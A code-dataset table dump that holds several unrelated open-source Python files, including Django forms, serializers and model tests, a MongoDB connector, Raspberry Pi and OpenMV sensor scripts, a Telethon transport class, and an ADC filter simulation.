hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d590b2e41df4cf47a10f9711b5f682f57ac29747 | 62 | py | Python | lib/__init__.py | co9olguy/Generating-and-designing-DNA | 7dab87a1002790d37e929c5542f9761ae7d16416 | [
"Unlicense"
] | 32 | 2018-04-29T22:34:43.000Z | 2022-03-14T05:54:25.000Z | lib/__init__.py | co9olguy/Generating-and-designing-DNA | 7dab87a1002790d37e929c5542f9761ae7d16416 | [
"Unlicense"
] | 3 | 2019-04-02T07:05:34.000Z | 2022-02-18T17:34:03.000Z | lib/__init__.py | co9olguy/Generating-and-designing-DNA | 7dab87a1002790d37e929c5542f9761ae7d16416 | [
"Unlicense"
] | 11 | 2018-05-25T09:31:37.000Z | 2021-12-13T17:58:29.000Z | from .utils import *
from .models import *
from .dna import *
| 15.5 | 21 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d5911080649fbef3f58c84aa754a86cb5bf6ca4d | 2,098 | py | Python | src/app/forms.py | triump0870/i2a | bc4b9e7615d645b153a4df5a37d3e088a2ed47b7 | [
"MIT"
] | null | null | null | src/app/forms.py | triump0870/i2a | bc4b9e7615d645b153a4df5a37d3e088a2ed47b7 | [
"MIT"
] | null | null | null | src/app/forms.py | triump0870/i2a | bc4b9e7615d645b153a4df5a37d3e088a2ed47b7 | [
"MIT"
] | null | null | null | from django import forms
from app.models import Application, Owner, Questionnaire, Tag, Rule, TagType
from crispy_forms.bootstrap import Field
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Layout, Submit, ButtonHolder, Fieldset, Hidden, HTML
class ApplicationForm(forms.ModelForm):
    """ModelForm for creating/editing an Application and its review metadata."""
    class Meta:
        model = Application
        fields = ['name', 'description', 'primary_owner', 'secondary_owner', 'logo', 'review_cycle', 'next_review_date']
# def __init__(self, *args, **kwargs):
# super(ApplicationForm, self).__init__(*args, )
# self.helper = FormHelper()
# self.helper.form_tag = False
# self.helper.form_class = 'form-horizontal'
# self.helper.layout = Layout(
# Field('name'),
# Field('description'),
# Field('primary_owner'),
# Field('secondary_owner'),
# Field('logo'),
# Field('review_cycle'),
# Field('next_review_date', css_class='input-small dateinput'),
# Submit('submit', 'Submit', css_class="btn-success"),
# )
class OwnerForm(forms.ModelForm):
    """ModelForm exposing an Owner's name and email."""
    class Meta:
        model = Owner
        fields = ['name', 'email']
class QuestionnaireForm(forms.ModelForm):
    """ModelForm for a Questionnaire, rendered inline via crispy-forms."""
    def __init__(self, *args, **kwargs):
        super(QuestionnaireForm, self).__init__(*args, **kwargs)
        # Configure crispy-forms to render the single field inline.
        self.helper = FormHelper(self)
        self.helper.form_class = 'form-inline'
        self.helper.field_template = 'bootstrap3/layout/inline_field.html'
        self.helper.layout = Layout(
            Field('application_name')
        )
    class Meta:
        model = Questionnaire
        fields = ['application_name']
class TagForm(forms.ModelForm):
    """ModelForm for creating/editing a Tag."""
    class Meta:
        model = Tag
        fields = ['name', 'type', 'description']
class TagTypeForm(forms.ModelForm):
    """ModelForm for creating/editing a TagType."""
    class Meta:
        model = TagType
        fields = ['name', 'description']
class RuleForm(forms.ModelForm):
    """ModelForm exposing every field of the Rule model."""
    class Meta:
        model = Rule
        fields = '__all__'
| 31.313433 | 120 | 0.604862 | 1,808 | 0.861773 | 0 | 0 | 0 | 0 | 0 | 0 | 798 | 0.380362 |
d591a35f1a2c7e8df082016293ac3874fbf0a395 | 495 | py | Python | rest_api/mongo_connect.py | pssudo/kubernetes-fastapi | 87592c90fd09e587196674592b2dbdc4bc7a64ce | [
"MIT"
] | 1 | 2021-03-21T04:18:58.000Z | 2021-03-21T04:18:58.000Z | rest_api/mongo_connect.py | pssudo/kubernetes-fastapi | 87592c90fd09e587196674592b2dbdc4bc7a64ce | [
"MIT"
] | null | null | null | rest_api/mongo_connect.py | pssudo/kubernetes-fastapi | 87592c90fd09e587196674592b2dbdc4bc7a64ce | [
"MIT"
] | null | null | null | import motor.motor_asyncio
import os

# Every connection parameter is taken from the environment; a missing
# variable raises KeyError immediately at import time.
mongo_server = os.environ['DB_HOST']
mongo_port = os.environ['DB_PORT']
mongo_db = os.environ['DB_NAME']
mongo_user = os.environ['DB_USER']
mongo_passwd = os.environ['DB_PASSWD']

# MongoDB connection URI, authenticating against the admin database.
MONGO_DETAILS = f"mongodb://{mongo_user}:{mongo_passwd}@{mongo_server}:{mongo_port}/?authSource=admin"

# Async client/database handles shared by the rest of the API.
client = motor.motor_asyncio.AsyncIOMotorClient(MONGO_DETAILS)
database = client[mongo_db]
electronic_collection = database.get_collection("electronics") | 45 | 125 | 0.759596 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 101 | 0.20404 |
d5941de181d766fe9b1b45b29107028645c7d1ae | 512 | py | Python | cloudmesh/pi/water.py | cloudmesh/cloudmesh.pi | bdf706b3763031341c41b811749064c293e73c14 | [
"Apache-2.0"
] | 2 | 2017-09-18T00:56:36.000Z | 2018-06-01T23:41:23.000Z | cloudmesh/pi/water.py | cloudmesh/cloudmesh-pi | bdf706b3763031341c41b811749064c293e73c14 | [
"Apache-2.0"
] | 1 | 2018-04-16T18:37:17.000Z | 2018-04-16T18:37:17.000Z | cloudmesh/pi/water.py | cloudmesh/cloudmesh.pi | bdf706b3763031341c41b811749064c293e73c14 | [
"Apache-2.0"
] | 3 | 2017-09-20T11:13:54.000Z | 2017-11-30T23:48:37.000Z | import time
import grovepi
class WaterSensor(object):
    """Thin wrapper around a Grove water sensor attached to a GrovePi digital port."""
    def __init__(self, pin=2):
        """
        connect sensor to digital port. D2 is default.
        :param pin: Number
        """
        self.pin = pin
        # Configure the port for reading before any get() call.
        grovepi.pinMode(self.pin, "INPUT")
    def get(self):
        """
        gets the value measured by water sensor.
        :return: Integer
        """
        return grovepi.digitalRead(self.pin)
if __name__ == "__main__":
    # Demo: take a single reading from the sensor and print it.
    sensor = WaterSensor()
    print(sensor.get())
| 19.692308 | 54 | 0.564453 | 393 | 0.767578 | 0 | 0 | 0 | 0 | 0 | 0 | 203 | 0.396484 |
d594390832d9d4fefb61b67618c808b718384226 | 928 | py | Python | telethon/network/connection/tcpabridged.py | s3mple/Telethon | 476bbdd6a1fb6f917adf9204e6cd825b008dd9c1 | [
"MIT"
] | 1 | 2018-10-07T08:31:49.000Z | 2018-10-07T08:31:49.000Z | telethon/network/connection/tcpabridged.py | s3mple/Telethon | 476bbdd6a1fb6f917adf9204e6cd825b008dd9c1 | [
"MIT"
] | null | null | null | telethon/network/connection/tcpabridged.py | s3mple/Telethon | 476bbdd6a1fb6f917adf9204e6cd825b008dd9c1 | [
"MIT"
] | 1 | 2018-09-05T14:59:27.000Z | 2018-09-05T14:59:27.000Z | import struct
from .tcpfull import ConnectionTcpFull
class ConnectionTcpAbridged(ConnectionTcpFull):
    """
    This is the mode with the lowest overhead, as it will
    only require 1 byte if the packet length is less than
    508 bytes (127 << 2, which is very common).
    """
    async def connect(self, ip, port):
        # Establish the plain TCP connection, then announce the abridged
        # transport by sending the single 0xEF marker byte.
        result = await super().connect(ip, port)
        await self.conn.write(b'\xef')
        return result

    async def recv(self):
        # The first byte is the payload length in 4-byte words; the value
        # 127 (0x7f) escapes to a 3-byte little-endian length that follows.
        word_count = (await self.read(1))[0]
        if word_count >= 127:
            word_count = int.from_bytes(await self.read(3), 'little')
        return await self.read(word_count << 2)

    async def send(self, message):
        # Lengths are expressed in 4-byte words: one byte when it fits,
        # otherwise the 0x7f escape followed by 3 little-endian length bytes.
        word_count = len(message) >> 2
        if word_count < 127:
            header = bytes([word_count])
        else:
            header = b'\x7f' + word_count.to_bytes(3, 'little')
        await self.write(header + message)
| 29 | 71 | 0.595905 | 871 | 0.938578 | 0 | 0 | 0 | 0 | 627 | 0.675647 | 213 | 0.229526 |
d5959b570e07360b0fe5902da6068315badc51ef | 1,274 | py | Python | app/core/tests/test_models.py | ahmedgamalmansy/recipe-app-api | 14443d9cd7d0fe2504361e8f86a9505c8faa9093 | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | ahmedgamalmansy/recipe-app-api | 14443d9cd7d0fe2504361e8f86a9505c8faa9093 | [
"MIT"
] | null | null | null | app/core/tests/test_models.py | ahmedgamalmansy/recipe-app-api | 14443d9cd7d0fe2504361e8f86a9505c8faa9093 | [
"MIT"
] | null | null | null | from django.test import TestCase
from django.contrib.auth import get_user_model
class ModelTests(TestCase):
    """Unit tests for the project's custom user model manager."""
    def test_create_user_with_email_successful(self):
        """ test create new user with an email is successful"""
        email = "ahmed.mansy@segmatek.com"
        password= "Agmansy0100"
        user = get_user_model().objects.create_user(
            email = email,
            password = password
        )
        self.assertEqual(user.email, email)
        self.assertTrue(user.check_password(password))
    def test_new_user_email_normalized(self):
        """ test that email for new user is normalized"""
        email = "ahmed.mansy@SEGMATEK.com"
        password= "Agmansy0100"
        user = get_user_model().objects.create_user(email, password)
        self.assertEqual(user.email, email.lower())
        self.assertTrue(user.check_password(password))
    def test_new_user_invalid_email(self):
        """ test creating new user with no email address"""
        with self.assertRaises(ValueError):
            get_user_model().objects.create_user(None, 'test123')
    def test_create_new_superuser(self):
        """ test creating a new superuser sets the superuser and staff flags"""
        email = "ahmed.mansy@SEGMATEK.com"
        password= "Agmansy0100"
        user = get_user_model().objects.create_superuser(email, password)
        self.assertTrue(user.is_superuser)
self.assertTrue(user.is_staff) | 31.073171 | 68 | 0.752747 | 1,193 | 0.936421 | 0 | 0 | 0 | 0 | 0 | 0 | 330 | 0.259027 |
d5964f0e3f92c5ca6a4083ce024d1eef5ffe0c51 | 350 | py | Python | elements/light.py | partha-ghosh/pyeffects | b941e9b09c9889c01b103d758707d36c3520de2a | [
"MIT"
] | null | null | null | elements/light.py | partha-ghosh/pyeffects | b941e9b09c9889c01b103d758707d36c3520de2a | [
"MIT"
] | null | null | null | elements/light.py | partha-ghosh/pyeffects | b941e9b09c9889c01b103d758707d36c3520de2a | [
"MIT"
] | null | null | null | import numpy as np
class Light:
    """Module-level singleton describing the scene's single light source.

    All state lives on the class itself; the accessors below mutate/read
    the shared class attributes.
    """
    # Homogeneous position (x, y, z, w).
    _position = np.array([960, 540, 300.0, 1])
    # RGB color, one value per channel.
    _color = np.array([255, 255, 255])

    # Fix: these functions were defined without `self` and without
    # @staticmethod, so calling them on an instance (Light().get_color())
    # raised TypeError. @staticmethod keeps class-level calls working
    # exactly as before and makes instance-level calls work too.
    @staticmethod
    def set_position(position):
        """Replace the light's homogeneous position (length-4 array-like)."""
        Light._position = position

    @staticmethod
    def set_color(color):
        """Replace the light's RGB color (length-3 array-like)."""
        Light._color = color

    @staticmethod
    def get_color():
        """Return the current RGB color."""
        return Light._color

    @staticmethod
    def get_position():
        """Return the current homogeneous position."""
        return Light._position
| 18.421053 | 46 | 0.617143 | 328 | 0.937143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
d5965fa61cb67bd67adba3b00ebd73edc4c2a0a6 | 727 | py | Python | pyAI-OpenMV4/2.机器视觉/7.图片拍摄/1.普通拍摄/snapshot.py | 01studio-lab/MicroPython_Examples | f06a1bee398674ceafebed2aac88d8413cc8abad | [
"MIT"
] | 73 | 2020-05-02T13:48:27.000Z | 2022-03-26T13:15:10.000Z | pyAI-OpenMV4/2.机器视觉/7.图片拍摄/1.普通拍摄/snapshot.py | 01studio-lab/MicroPython_Examples | f06a1bee398674ceafebed2aac88d8413cc8abad | [
"MIT"
] | null | null | null | pyAI-OpenMV4/2.机器视觉/7.图片拍摄/1.普通拍摄/snapshot.py | 01studio-lab/MicroPython_Examples | f06a1bee398674ceafebed2aac88d8413cc8abad | [
"MIT"
] | 50 | 2020-05-15T13:57:28.000Z | 2022-03-30T14:03:33.000Z | # 普通拍照例程
#
# Note: you need an SD card inserted to run this example.
#
# You can use your OpenMV device to save pictures.
# Import the required modules; pyb is used for LED control.
import sensor, image, pyb
RED_LED_PIN = 1
BLUE_LED_PIN = 3
# Camera initialization.
sensor.reset() # Initialize the camera sensor.
sensor.set_pixformat(sensor.RGB565) # or sensor.GRAYSCALE
sensor.set_framesize(sensor.QVGA) # or sensor.QQVGA (or others)
sensor.skip_frames(time = 2000) # Let new settings take affect.
# Red LED on: the capture sequence is about to start.
pyb.LED(RED_LED_PIN).on()
sensor.skip_frames(time = 2000) # Give the user 2 seconds to get ready.
pyb.LED(RED_LED_PIN).off()
# Blue LED on: the picture is being taken.
pyb.LED(BLUE_LED_PIN).on()
print("You're on camera!")
sensor.snapshot().save("example.jpg") # Take and save the picture; "example.bmp" or other formats also work.
pyb.LED(BLUE_LED_PIN).off() # Capture finished.
print("Done! Reset the camera to see the saved image.")
| 22.030303 | 71 | 0.749656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 556 | 0.593383 |
d596976be192ececaf598f9c26104ca0d3976fc5 | 344 | py | Python | website/addons/osfstorage/settings/defaults.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | [
"Apache-2.0"
] | null | null | null | website/addons/osfstorage/settings/defaults.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | [
"Apache-2.0"
] | 13 | 2020-03-24T15:29:41.000Z | 2022-03-11T23:15:28.000Z | website/addons/osfstorage/settings/defaults.py | DanielSBrown/osf.io | 98dda2ac237377197acacce78274bc0a4ce8f303 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
import os
from website import settings
# Credentials handed to WaterButler's storage provider (the local
# filesystem provider needs none).
WATERBUTLER_CREDENTIALS = {
    'storage': {}
}
# WaterButler provider settings: keep files on the local filesystem under
# BASE_PATH/osfstoragecache.
WATERBUTLER_SETTINGS = {
    'storage': {
        'provider': 'filesystem',
        'folder': os.path.join(settings.BASE_PATH, 'osfstoragecache'),
    }
}
# NOTE(review): presumably names the WATERBUTLER_SETTINGS key that holds the
# storage root — confirm against the WaterButler consumer.
WATERBUTLER_RESOURCE = 'folder'
# Mirror the site-wide disk saving flag.
DISK_SAVING_MODE = settings.DISK_SAVING_MODE
| 15.636364 | 70 | 0.680233 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.261628 |
d5979c547106abfe2c4a788fa3eb19744770566f | 371 | py | Python | 3_dot_product.py | codeclassifiers/nnfs | 8583c1ccf3d155779057cb5041d52a3002282b04 | [
"MIT"
] | 1 | 2021-09-18T05:00:05.000Z | 2021-09-18T05:00:05.000Z | 3_dot_product.py | codeclassifiers/nnfs | 8583c1ccf3d155779057cb5041d52a3002282b04 | [
"MIT"
] | null | null | null | 3_dot_product.py | codeclassifiers/nnfs | 8583c1ccf3d155779057cb5041d52a3002282b04 | [
"MIT"
] | 1 | 2021-09-18T05:00:06.000Z | 2021-09-18T05:00:06.000Z | #Example of dot product using numpy
import numpy as np

#Sample input to perceptron
inputs = [1.2, 2.2, 3.3, 2.5]
#Weights passed to perceptron
weights = [0.4,0.6,-0.7, 1.1]
#bias for a particular perceptron
bias = 2
#Take dot product between weights and input
#and add bias to the summation value
output = np.dot(inputs, weights) + bias
print(output)
#Output:-
# 4.24
# Fix: the expected-output value above was previously a bare expression
# statement (`4.24`), a harmless but stray no-op; it is now a comment.
d5993de97589837ac20b5cb949eaf132912bde00 | 4,725 | py | Python | m2k/python/precision_adc_tutorial/ad7124_filters.py | mthoren-adi/education_tools | e99d47d0d6b56e05c8ed6692d57fa8518d610630 | [
"CC-BY-4.0"
] | 17 | 2018-11-11T03:08:57.000Z | 2022-02-15T22:37:59.000Z | m2k/python/precision_adc_tutorial/ad7124_filters.py | chensi007/education_tools | 3b4280308eb34bcafbd50035ea780a269883f2f7 | [
"CC-BY-4.0"
] | 6 | 2019-07-31T13:05:36.000Z | 2021-07-06T06:51:11.000Z | m2k/python/precision_adc_tutorial/ad7124_filters.py | chensi007/education_tools | 3b4280308eb34bcafbd50035ea780a269883f2f7 | [
"CC-BY-4.0"
] | 18 | 2018-10-29T20:11:36.000Z | 2022-01-24T00:42:10.000Z | # -*- coding: utf-8 -*-
# ---------------------------------------------------------------------------
# Copyright (c) 2015-2019 Analog Devices, Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Modified versions of the software must be conspicuously marked as such.
# - This software is licensed solely and exclusively for use with
# processors/products manufactured by or for Analog Devices, Inc.
# - This software may not be combined or merged with other code in any manner
# that would cause the software to become subject to terms and conditions
# which differ from those listed here.
# - Neither the name of Analog Devices, Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
# - The use of this software may or may not infringe the patent rights of one
# or more patent holders. This license does not release you from the
# requirement that you obtain separate licenses from these patent holders
# to use this software.
#
# THIS SOFTWARE IS PROVIDED BY ANALOG DEVICES, INC. AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# NON-INFRINGEMENT, TITLE, MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL ANALOG DEVICES, INC. OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, PUNITIVE OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# DAMAGES ARISING OUT OF CLAIMS OF INTELLECTUAL PROPERTY RIGHTS INFRINGEMENT;
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# 2019-01-10-7CBSD SLA
# -----------------------------------------------------------------------
'''
Simulation of some of the AD7124's filters.
This program QUALITATIVELY derives a filter of a type similar to that
used in the AD7124 family of ADCs, that is, it is not bit-accurate, refer
to the datasheet for guaranteed specifications.
Tested with Python 3.7, Anaconda distribution
'''
from numpy import min, max, convolve, random, average, ones, zeros, amax, log
import numpy as np
from scipy import linspace, fft
from scipy import signal
from scipy.signal import lti, step
from matplotlib import pyplot as plt
plot_sinc4 = True
# Base sample rate in high-power mode, From AD7124 datasheet
f0 = 19200
# Calculate SINC1 oversample ratios for 50, 60Hz
osr50 = int(f0/50)
osr60 = int(f0/60)
# Create "boxcar" SINC1 filters
sinc1_50 = np.ones(osr50)
sinc1_60 = np.ones(osr60)
# Calculate higher order filters (each convolution raises the SINC order).
sinc2_50 = np.convolve(sinc1_50, sinc1_50)
sinc3_50 = np.convolve(sinc2_50, sinc1_50)
sinc4_50 = np.convolve(sinc2_50, sinc2_50)
# Here's the filter from datasheet Figure 91,
# SINC4-ish filter with one three zeros at 50Hz, one at 60Hz.
filt_50_60_rej = np.convolve(sinc3_50, sinc1_60)
# Normalize to unity gain by dividing by sum of all taps
sinc1_50 /= np.sum(sinc1_50)
sinc1_60 /= np.sum(sinc1_60)
sinc2_50 /= np.sum(sinc2_50)
sinc3_50 /= np.sum(sinc3_50)
sinc4_50 /= np.sum(sinc4_50)
filt_50_60_rej /= np.sum(filt_50_60_rej)
# freqz: Compute the frequency response of a digital filter.
# Older versions of SciPy return w as radians / sample, newer take an optional
# sample rate argument (fs). Computing frequencies (freqs)
# manually for backwards compatibility.
w, h = signal.freqz(filt_50_60_rej, 1, worN=16385, whole=False) #, fs=f0)
freqs = w * f0/(2.0*np.pi)
# NOTE(review): `max` is numpy's (star-imported above); on a complex array it
# compares lexicographically, not by magnitude — presumably the peak is at DC
# where h is real-valued. Confirm this is the intended normalization.
hmax = abs(max(h)) #Normalize to unity
response_dB = 20.0 * np.log10(abs(h)/hmax)
# Figure 1: impulse responses (filter tap values).
plt.figure(1)
plt.title('50Hz SINC1,2,4, and 50/60Hz SINC4 impulse responses')
plt.ylabel('tap val.')
plt.plot(sinc1_50)
plt.plot(sinc2_50)
plt.plot(sinc4_50)
plt.plot(filt_50_60_rej)
plt.xlabel('tap number')
plt.xlim(left=-100, right= 1.1* len(filt_50_60_rej))
plt.grid()
# Figure 2: frequency response in dB, zoomed to 0-150 Hz to show the notches.
plt.figure(2)
plt.plot(freqs, response_dB, zorder=1)
plt.title('50/60Hz reject filter response')
plt.xlabel('Frequency')
plt.ylabel('Rejection')
plt.axis([0, 150, -120, 1])
plt.show()
| 39.049587 | 78 | 0.738836 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,464 | 0.733122 |
d599b8f92a8d48d05fa9f2f452a677696ae82fe2 | 962 | py | Python | products/forms.py | NewtonHead/e-commerce_project | 5ed448b033cd3771fc63f62022fe84ac8e17442d | [
"MIT"
] | null | null | null | products/forms.py | NewtonHead/e-commerce_project | 5ed448b033cd3771fc63f62022fe84ac8e17442d | [
"MIT"
] | null | null | null | products/forms.py | NewtonHead/e-commerce_project | 5ed448b033cd3771fc63f62022fe84ac8e17442d | [
"MIT"
] | null | null | null | from django import forms
from .models import Product, Category
from mptt.forms import TreeNodeChoiceField
from django.forms.fields import ImageField
class ProductForm(forms.Form):
    """Plain (non-model) form for creating a product listing."""
    title = forms.CharField(
        label='',
        widget=forms.TextInput(
            attrs={
                'placeholder': 'Your title'
            }
        )
    )
    image = forms.ImageField()
    description = forms.CharField(
        required=False,
        widget=forms.Textarea(
            attrs={
                #'class': a CSS class would go here if you want to use one
                #'id': and the element id here
                'rows': 5,
                'cols': 20,
                'placeholder': 'Describe your product :)'
            }
        )
    )
    # Category is picked from the django-mptt tree of Category objects.
    category = TreeNodeChoiceField(queryset=Category.objects.all())
    price = forms.DecimalField(initial=69.99)
    featured = forms.BooleanField()
d59b2e857c3657e22162648df0dce76d10dbed3f | 376 | py | Python | adminweb/migrations/0002_alter_profissional_cep.py | FinotelliCarlos/ewipesimple-adminweb-python | 3bf779250efeb9f85b4283ffbf210bf227aa8e8c | [
"MIT"
] | 1 | 2021-06-17T06:13:33.000Z | 2021-06-17T06:13:33.000Z | adminweb/migrations/0002_alter_profissional_cep.py | FinotelliCarlos/ewipesimple-adminweb-python | 3bf779250efeb9f85b4283ffbf210bf227aa8e8c | [
"MIT"
] | null | null | null | adminweb/migrations/0002_alter_profissional_cep.py | FinotelliCarlos/ewipesimple-adminweb-python | 3bf779250efeb9f85b4283ffbf210bf227aa8e8c | [
"MIT"
] | null | null | null | # Generated by Django 3.2 on 2021-06-16 16:53
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('adminweb', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='profissional',
name='cep',
field=models.CharField(max_length=8),
),
]
| 19.789474 | 49 | 0.590426 | 285 | 0.757979 | 0 | 0 | 0 | 0 | 0 | 0 | 88 | 0.234043 |
d59b7e7d7e960aceb68d09f0d6e1dfd11582bf66 | 7,064 | py | Python | ios/serializers.py | NadavK/djhome | 4f0d936dc475c91e0590bd22deae818cf2650840 | [
"MIT"
] | null | null | null | ios/serializers.py | NadavK/djhome | 4f0d936dc475c91e0590bd22deae818cf2650840 | [
"MIT"
] | 8 | 2020-02-11T23:59:46.000Z | 2022-03-03T21:49:33.000Z | ios/serializers.py | NadavK/djhome | 4f0d936dc475c91e0590bd22deae818cf2650840 | [
"MIT"
] | null | null | null | from .models import Input, Output, InputToOutput, Device
from rest_framework import serializers
from taggit_serializer.serializers import (TagListSerializerField, TaggitSerializer)
from taggit.models import Tag
class DeviceSerializer(serializers.ModelSerializer):
    """Serializes a Device as its id and description."""
    class Meta:
        model = Device
        fields = ('id', 'description')
class InputSerializer(TaggitSerializer, serializers.HyperlinkedModelSerializer):
    """Full serializer for Input objects, with tags and a nested device."""
    #url = serializers.HyperlinkedIdentityField(view_name="input:id")
    pk = serializers.ReadOnlyField()
    tags = TagListSerializerField()
    # Human-readable name of the input type; see get_type below.
    type = serializers.SerializerMethodField()
    device = DeviceSerializer(many=False)
    #device = serializers.PrimaryKeyRelatedField(queryset=Device.objects.all(), allow_null=True)
    #highlight = serializers.HyperlinkedIdentityField(view_name='set_down', format='html')
    class Meta:
        model = Input
        #fields = ('url', 'ph_sn', 'index', 'input_type', 'deleted', 'description', 'outputs')
        #fields = ('url', 'url2', 'ph_sn', 'index', 'input_type', 'deleted', 'description', 'outputs', 'tags',)
        fields = '__all__'
    def get_type(self, obj):
        """Map the 1-based input_type code to its display name, or 'UNKNOWN'."""
        try:
            return Input.INPUT_TYPES[obj.input_type-1][1]
        except Exception as ex:
            return 'UNKNOWN'
    # def get_device(self, obj):
    #     try:
    #         return obj.device.pk
    #     except Exception as ex:
    #         return 'NONE'
    def set_device(self, obj, value):
        """Assign a new device pk on obj.
        NOTE(review): on failure this returns the string 'NONE' (and the
        happy path returns None) — confirm callers ignore the return value.
        """
        try:
            obj.device.pk = value
        except Exception as ex:
            return 'NONE'
class InputSimpleSerializer(TaggitSerializer, serializers.ModelSerializer):
    """Compact Input serializer used for list-style payloads."""
    tags = TagListSerializerField()
    type = serializers.SerializerMethodField()
    class Meta:
        model = Input
        fields = 'pk', 'description', 'type', 'tags', 'state'
    def get_type(self, obj):
        """Map the 1-based input_type code to its display name, or 'UNKNOWN'."""
        try:
            return Input.INPUT_TYPES[obj.input_type-1][1]
        except Exception as ex:
            return 'UNKNOWN'
class InputAdminSerializer(InputSimpleSerializer):
    """Admin view of an input: also exposes the owning device and index."""
    class Meta(InputSimpleSerializer.Meta):
        model = Input
        fields = 'pk', 'description', 'type', 'tags', 'state', 'device', 'index'
#
# class OutputSerializer_base(TaggitSerializer, serializers.HyperlinkedModelSerializer):
# def get_type(self, obj):
# try:
# import logging
# logger = logging.getLogger('ios.views.IOsView')
# logger.debug('??????????????????????????????????????????????????')
#
# return Output.OUTPUT_TYPES[obj.output_type-1][1]
# except Exception as ex:
# return 'UNKNOWN'
#
# def get_permissions(self, obj):
# try:
# return obj.permissions
# except Exception as ex:
# return 'UNKNOWN'
#
#
# class OutputSerializer(OutputSerializer_base):
# #url = serializers.HyperlinkedIdentityField(view_name="input:id")
# pk = serializers.ReadOnlyField()
# type = serializers.SerializerMethodField()
# tags = TagListSerializerField()
# permissions = serializers.SerializerMethodField()
#
# class Meta:
# model = Output
# fields = '__all__'
# extra_fields = ['permissions']
# #fields = ('pk', 'url', 'ph_sn', 'index', 'output_type', 'deleted', 'description', 'total_progress', '_my_state',)
#
# def get_field_names(self, declared_fields, info):
# """
# Adds the 'extra_fields' to '_all_'
# https://stackoverflow.com/questions/38245414/django-rest-framework-how-to-include-all-fields-and-a-related-field-in-mo
# :param declared_fields:
# :param info:
# :return:
# """
# import logging
# logger = logging.getLogger('ios.views.IOsView')
# logger.debug('%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%')
# expanded_fields = super(OutputSerializer, self).get_field_names(declared_fields, info)
# logger.debug('*************************************')
# logger.debug(expanded_fields)
#
# if getattr(self.Meta, 'extra_fields', None):
# logger.debug('++++++++++++++++++++++++++++++++++++++')
# logger.debug(expanded_fields)
# return expanded_fields + self.Meta.extra_fields
# else:
# logger.debug('--------------------------------------')
# logger.debug(expanded_fields)
# return expanded_fields
#
#
#
# class OutputSimpleSerializer(OutputSerializer_base):
# type = serializers.SerializerMethodField()
# tags = TagListSerializerField()
# permissions = serializers.SerializerMethodField()
#
# class Meta:
# model = Output
# fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'permissions'
#
#
# class OutputAdminSerializer(OutputSimpleSerializer):
# class Meta(OutputSimpleSerializer.Meta):
# model = Output
# fields = 'pk', 'description', 'state', 'type', 'tags', 'execution_limit', 'started_time', 'current_position', 'ph_sn', 'index'
#
class OutputSerializer(TaggitSerializer, serializers.HyperlinkedModelSerializer):
    """Full serializer for Output objects, with tags, permissions and device."""
